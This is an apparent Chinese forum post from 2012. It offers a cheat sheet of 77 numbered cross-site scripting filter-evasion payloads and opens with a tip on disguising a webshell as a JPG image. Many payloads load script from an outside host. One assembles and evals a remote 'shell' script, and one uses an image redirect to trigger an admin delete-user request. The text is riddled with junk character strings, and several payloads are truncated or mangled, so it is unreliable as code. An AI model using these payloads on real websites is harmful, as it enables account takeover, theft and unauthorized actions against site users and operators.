跨站图片shell
0 ~, N* l2 X9 J% a# z4 vXSS跨站代码 <script>alert("")</script>
2 P1 Q* X& V* a+ I4 d
0 L0 i$ F7 F9 ]% h2 }8 O) H( O将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马% {% _5 r, d: [8 B6 m
8 w4 D3 X7 P. ^
" q8 y$ j; u- F6 \9 }+ `" z' o. q7 D9 e3 w; ?( Q: d% h! b8 q- h
1)普通的XSS JavaScript注入8 i& U6 `+ R/ _" h8 u, j
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ k; E( `9 T6 @$ y* a. G, k4 B) N# j$ f) A& y# Z: P
(2)IMG标签XSS使用JavaScript命令
" ^2 y6 `! N2 q" h, A<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. H/ U3 A d% Y0 T: R( g. e( n; }9 ]6 l+ }: l: B# |; g4 m
(3)IMG标签无分号无引号
( R ^ v) |) a2 z0 v# W) w% S8 R<IMG SRC=javascript:alert(‘XSS’)>* Z2 |/ b( S' `4 A* ^
- v7 E- i; ]7 t" l
(4)IMG标签大小写不敏感/ v" p/ E9 q& f+ F
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>& S& e2 \- E5 H
: t4 o) j( X- U2 u) U7 V
(5)HTML编码(必须有分号)
: Q, c( `7 l* a/ f, N' V5 c- V<IMG SRC=javascript:alert(“XSS”)>
9 a# }" f. K; W) B! w, A( B( L1 ^: M" K- I3 I
(6)修正缺陷IMG标签# X$ n5 f; j! F; R J
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* t/ }: b" m* {3 m- @1 W' r; M; e0 b3 j; }
(7)formCharCode标签(计算器)5 Q8 v) n+ e- H* O2 k" ~! @: O' \
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> p% C3 }+ H" ]' Q+ T( Y- U
3 h/ p1 `8 \: G( S! E
(8)UTF-8的Unicode编码(计算器)
2 [7 P u3 O6 y+ r& Z<IMG SRC=jav..省略..S')>; \$ \/ b. S. g( a+ _; N8 L$ m
4 W6 X; d, @( _ W% O( Z' N7 q
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)6 i& _6 n% m% _! Y3 s& w
<IMG SRC=jav..省略..S')>
/ L+ o5 T, U1 X j0 r& z. R0 u2 c; }7 j: |+ W2 l9 E
(10)十六进制编码也是没有分号(计算器)
5 W1 S" z9 ?4 i% b2 E5 I<IMG SRC=java..省略..XSS')>
. G, F ^% Z- B C0 b! l4 F7 e7 k; B6 H3 l
(11)嵌入式标签,将Javascript分开" `, d" V, z6 G# [
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 q6 a6 V9 `/ M- e' V- G; b
4 S: ?9 Y' O8 D' O1 g# y2 C# _(12)嵌入式编码标签,将Javascript分开
, q, K" ^5 i& V- Y+ s+ I<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ J9 w% [: u! v F6 k: c) ]/ u- z9 A5 m+ \6 m
(13)嵌入式换行符
( ?. F, D% z4 r, ` _<IMG SRC=”jav ascript:alert(‘XSS’);”>
" @ L& k4 W" T: `! f
6 O2 r3 j1 f( R% n9 }4 P(14)嵌入式回车$ g3 X3 A! z+ ]) _& k2 o
<IMG SRC=”jav ascript:alert(‘XSS’);”>% }, ^+ n# t3 y9 x0 K- D( L- P
U( m1 p" U' _8 c9 p, ]
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 C. q; H; B* B8 N<IMG SRC=”javascript:alert(‘XSS‘)”>
9 Q- i% f" P. C' R
/ Z5 f* G: O: }(16)解决限制字符(要求同页面)
" |: H& ^- a# u& o [' Y<script>z=’document.’</script>
9 Q* O" t) G9 T& U) `; W$ x<script>z=z+’write(“‘</script>
% _- l7 A0 v* J% `, T2 q<script>z=z+’<script’</script>6 P; K! M9 ^4 n$ }
<script>z=z+’ src=ht’</script>
* T! {( s1 z* \" G# N- M a* }<script>z=z+’tp://ww’</script>
' o# D ^7 g& _6 d<script>z=z+’w.shell’</script>
6 B" t/ P0 c, n" O9 I- K$ g) Q7 H5 Q<script>z=z+’.net/1.’</script>
# [4 X2 t8 [/ g* @+ @<script>z=z+’js></sc’</script>* Q1 M' n! v& _& Y" O
<script>z=z+’ript>”)’</script>
' P# r2 ]1 ^$ A F' n<script>eval_r(z)</script>5 h [$ Y; g) d& u- a! |
, H, ?* I1 k" i/ j5 q; h6 B# c' }
(17)空字符. @; @# e/ t/ L$ Y; k
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 d9 y5 P* J% t7 e- A" M+ c
# p! D" E: n0 z( e(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用; ?4 _* U" E2 ~0 n9 J
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 d; x4 e1 Q/ L7 a, p; b
$ t6 S. x: ?. g6 j" Y) z, `
(19)Spaces和meta前的IMG标签# K; y* b% y1 f' N7 w+ [0 z5 s! f: |
<IMG SRC=” javascript:alert(‘XSS’);”>5 ^" O1 ^$ `9 ^9 \- f: R. R, g
' D1 W- b$ E: F( U
(20)Non-alpha-non-digit XSS1 L4 |. I4 R3 P
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" M6 T w! x/ w& Z2 [
# r" {5 R$ c& G, N( O1 J: u [" ]& m$ V& i
(21)Non-alpha-non-digit XSS to 2
* O' _* ]& X) _<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>$ B8 m3 i; [1 Y6 S( G
/ \0 r/ @ B6 ?* j" ? L F4 E
(22)Non-alpha-non-digit XSS to 3
( o: d/ h9 ~- d<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* S& a2 H, |8 \- e* N, V
& e& \, v* g9 U- q' @/ ?(23)双开括号
% N" L. ^& s- r9 T5 x& k- ]<<SCRIPT>alert(“XSS”);//<</SCRIPT>7 ~3 c8 {9 L4 a# h9 S9 C
9 v* Q3 V- x' t) | t3 F& [# | p$ f
(24)无结束脚本标记(仅火狐等浏览器)9 r7 G* E: }6 @9 m7 X* O5 ~
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- ~: l9 M' {9 M& _
4 G, a& w- ~. n, M+ t7 `( X5 }8 M(25)无结束脚本标记2' |- g2 c" A, l; ~$ o" P- D$ _% d
<SCRIPT SRC=//3w.org/XSS/xss.js>
1 P9 D+ S% G6 K4 w* Y. _' H2 M ~- |! ?# X
(26)半开的HTML/JavaScript XSS
: A1 }. L$ Z. G) z) `7 c! c<IMG SRC=”javascript:alert(‘XSS’)”
; K% L2 j+ w! P/ X6 Y9 o6 g; L
' ^2 f9 A0 t) g1 r(27)双开角括号7 r& A- Z b0 v! f' F
<iframe src=http://3w.org/XSS.html <
" S! e( Y1 S6 D5 j" ?
7 _& }! @$ u+ U" I5 _2 X- T2 O9 ~(28)无单引号 双引号 分号$ Z8 x+ o1 A7 g
<SCRIPT>a=/XSS/
* K) w! J* f3 t: Y: \2 Lalert(a.source)</SCRIPT>1 I8 o5 c5 H# Y6 f7 W# U5 _
% I9 N& P. a, f0 B
(29)换码过滤的JavaScript. N3 u2 `+ @" L( q. y, G* W
\”;alert(‘XSS’);//
( [' ]. R) m3 P% n! N0 p* \8 y3 d
# @8 W. M" t% _' D' o1 g: ](30)结束Title标签; F6 [6 t* \$ Q7 ?# }
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>" d6 H2 Z" X4 T
3 N2 w8 h! b& ^" w0 u g* o( h% \
(31)Input Image
6 N. r) w4 G9 p1 Y<INPUT SRC=”javascript:alert(‘XSS’);”>
4 Y* J5 W' U4 |$ c
5 r* |( m* I* f2 ?(32)BODY Image8 w) O% I1 { D D6 V
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
3 @) g% J( p" i
+ ~6 P8 N# @/ x" k) N: M$ t$ o+ A(33)BODY标签
# i; ~. @6 Y% A& z% J<BODY(‘XSS’)>* E9 C6 e. z8 Q9 Z2 P
8 M* o- E; D$ o9 ~; A8 B# i& j(34)IMG Dynsrc
! n% K$ {3 }( v' b) j& h<IMG DYNSRC=”javascript:alert(‘XSS’)”>
# }7 ^$ ?$ L3 [' \1 N: v# g
3 X$ s. K# f0 Z2 B3 w* U(35)IMG Lowsrc" I% r$ [4 x! \4 \
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
& g8 Z. H( x. P+ s' b" p* g( V K$ n6 d7 }1 h
(36)BGSOUND
- V% O. s+ P" a<BGSOUND SRC=”javascript:alert(‘XSS’);”>
, R( k7 I, ?( P7 [3 W+ Z i( F& f" o' m/ V1 E D
(37)STYLE sheet
! g* a$ C: D- b2 \. S# Z2 F<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
6 K+ B& e& r6 T7 S; Z% u1 d5 r" P6 ~( Q# A( T9 q; J5 i8 s
(38)远程样式表
4 F! n, }; V/ o3 c" m9 c; X<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>- a' X5 l6 A6 s+ y$ V% M
4 B2 R% ~( z; A$ y(39)List-style-image(列表式)" ^4 K# {, w w0 M+ k# @
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" R. v: j: Y2 E- z
6 t- h8 p" p2 b( e2 ^(40)IMG VBscript
* A. M! I7 g2 ^9 m. r/ U) z<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 t/ B, Q3 f$ _7 i# s, w
9 E. F% B0 w# ~& K+ t- `(41)META链接url
3 Y% l5 G- [4 y: ]6 h4 _<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>0 g: j% C" B$ \8 q* h
8 @# r7 T1 H- a9 q
(42)Iframe) [* H" t& b$ L' p# ] a
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 f; `' Q- g, Y. F( {" Z1 N(43)Frame+ @. s/ A6 H6 u5 ^
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
8 `. [8 Y2 U, M) Y& @7 E
( i: o& `3 n8 _6 Z5 X* q' D8 V(44)Table
\3 r9 A4 ?9 N' F4 @<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
/ Y- q" l: C9 D6 q4 ~6 X5 f" u+ s% _! o0 ~* v( `
(45)TD- g8 |/ t2 u2 p$ x6 b6 F
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>: j7 T* u$ T9 ]. u
, |: I& o7 E' V) M(46)DIV background-image) [& @& |: w4 l3 \3 y
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>4 A+ b% Y0 _; o" d: n% q
! U) \: x: U6 W0 P" z4 c5 [) i(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)" k6 J0 h9 }6 V. j
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>, J# x' C$ \2 B& I, p! R7 l
5 \ f8 s1 q1 n! d1 R! O) s(48)DIV expression
6 b$ M, ]! |) i" O$ p. T<DIV STYLE=”width: expression_r(alert(‘XSS’));”> w* n6 V8 @3 Y
9 u, W0 B; v9 ~(49)STYLE属性分拆表达# ^/ N5 G3 T* q+ ` g/ F4 N, n- [
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 r2 d5 W) P, s! v p
7 n8 @8 ?* ]4 z( G
(50)匿名STYLE(组成:开角号和一个字母开头)
4 d3 _+ Y$ y% ?<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
. V& R! y6 S/ r ^, v1 r, f: _6 K! F X2 |' C
(51)STYLE background-image0 T/ g9 P/ b" I9 m, b. v
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
' s2 a; b& T6 K- ]: v- d: N ~9 k P& k r( R
(52)IMG STYLE方式
$ v. z: Z- f% `4 J8 X0 Vexppression(alert(“XSS”))’>
( W6 ^/ n" ]6 [" a
& H {" s1 X% r' X8 Y& }$ ~, U(53)STYLE background0 a' d) m9 @6 Y3 r) S
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>; c" u4 c! f! w" V6 t4 `7 h8 d
% z; F$ ~. B) ?9 W
(54)BASE& w: g, s; c2 W' a, o5 @
<BASE HREF=”javascript:alert(‘XSS’);//”>1 \9 O9 x6 C' d2 @4 Y" l9 B
( x/ ~( f% {1 r! z5 A5 J(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. O. u; R; ~& k x( o3 `" h: r
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>, Z" f3 N) u6 W1 O- {; _) x
4 \/ ^# U, M) O# N0 }7 ~, s b(56)在flash中使用ActionScrpt可以混进你XSS的代码3 g3 s8 F0 k4 {! B! ?" s
a=”get”;5 C% Y O) a- c, i1 e* s z5 p
b=”URL(\”";
9 M$ R# c9 ~4 W' C) ^c=”javascript:”;3 h4 X, j6 e: K6 ^3 \
d=”alert(‘XSS’);\”)”;5 L+ }+ V. H- Q) \; H0 r1 O1 y: P3 ^
eval_r(a+b+c+d);
1 m* W$ o4 E4 ^( a2 s2 n6 C2 p% Y
9 \' {( p% w, u4 x2 P& m(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
/ c) I- k: p& }- t. Q( Y6 R& J<HTML xmlns:xss>8 u0 h1 A- o0 M! {; G. Z2 c
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
: Q# a0 h0 m: D<xss:xss>XSS</xss:xss>
" K; B- E( I# E" Y</HTML>
8 e4 J* e+ ?8 [: N% s: C( e' A+ D5 Y/ U7 Z
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用% h5 P4 `( O9 l9 @; t4 H1 I
<SCRIPT SRC=””></SCRIPT>) @1 x8 |* Q: o3 \; Z/ @
5 s* z. p! u- F- t* a6 w( V
(59)IMG嵌入式命令,可执行任意命令
+ i( A9 v2 T- S* Y. M6 Y<IMG SRC=”http://www.XXX.com/a.php?a=b”>6 C( C. F! {5 ] J( s+ S# n
$ U! |4 s+ M0 a1 ^" \6 E3 `) a
(60)IMG嵌入式命令(a.jpg在同服务器)9 F0 A7 T( ~0 W% e$ {: i1 H/ i& R7 ?
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
4 ~/ J, `8 u7 }( d1 [. G1 x) b+ v) v) Q& G; j
(61)绕符号过滤' t8 c* D9 X3 [& ?: Z4 T
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ B) X4 i# M' ^, f/ Y6 G# y) q
( B8 k3 \# G, k(62)
/ v. h4 ]- z- n3 a% y6 ^' ]' u<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) s# \$ G6 I; S3 {$ @# b& ?0 o* s! y/ |/ D0 e% s! x6 x2 f0 F
(63)
8 z% J% A H1 A4 c. M. \4 s% Z<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>. L: A6 l6 ~0 n) g* D8 o
! r& y( `( f! S6 @2 e2 V4 L3 g0 U% [& ]# N
(64) w7 a3 W3 Y1 u; d. e& A
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>) z% x* r' w. K* c5 q
D# {2 V. T6 h8 {$ O5 z
(65)" S7 y0 Q$ m( c8 j6 a
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( F! A% e8 i0 V
$ `( L4 m- V! M7 t, }5 T(66): s7 A9 P- m$ r2 h/ e; h5 \
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>$ c' G- N0 I8 R( K- E6 X
6 A2 d: D# j0 O(67)
?! O1 a5 j. s/ a- |3 ~7 `6 \1 ?<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>: K4 O. a* V8 n
: y2 L- u% x: s0 y" e(68)URL绕行
; n* v$ H' s/ v3 V0 U<A HREF=”http://127.0.0.1/”>XSS</A>
1 |/ m2 @4 J* O5 t1 |. R
1 H! k! P" E4 g$ j% |(69)URL编码8 S" ]- C$ x$ j1 t8 t4 W
<A HREF=”http://3w.org”>XSS</A>
9 V7 ?# F! { l* C& {3 w1 F; Z5 A D" ]3 X
(70)IP十进制% X- K& p/ ]3 t
<A HREF=”http://3232235521″>XSS</A>" h0 f! M0 w; a, A( Y8 K
9 |2 c% `3 z, s, Z. v8 V: V; i( K
(71)IP十六进制
) x2 Y, m% F, l<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
: O# m; L' J/ x$ q9 {1 {2 z( Q6 D& V" G4 n1 G' \" F- X# [0 E: k X
(72)IP八进制
% p& x3 K9 y- D) H/ x7 c<A HREF=”http://0300.0250.0000.0001″>XSS</A>7 f$ X2 i1 Y7 K% `" C4 f
' L7 A6 `' q3 D3 D) i+ z(73)混合编码
. l* f+ c) g* O* d' z8 d' P7 @<A HREF=”h
! g* N$ q: [7 j7 ~2 |1 ^2 Y( htt p://6 6.000146.0×7.147/”">XSS</A>
" K% M& C1 R8 ^! s' c: f3 S8 a" A' A2 c8 p0 N
(74)节省[http:]
: n8 b- ?' P4 V3 X5 L% S<A HREF=”//www.google.com/”>XSS</A>
! v5 t C- V& e/ ?" V
2 m9 K- p5 }# D- i6 u* e1 A8 d6 Z! S(75)节省[www]( h" a% t" _( M8 |
<A HREF=”http://google.com/”>XSS</A>
0 {1 E7 a3 ^; K
5 ]& \, b: W" C' [6 B# u3 x g(76)绝对点绝对DNS2 f- c# d! O4 J9 G% W; O& i
<A HREF=”http://www.google.com./”>XSS</A>6 J! [' d$ n) \* f( I( M
* f8 x# z' ^. j
(77)javascript链接4 e3 Q! _8 d- }! B' W
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
# y! a8 }( e+ c5 p, \ |
发表于 2012-9-13 17:04:56
收藏
支持
反对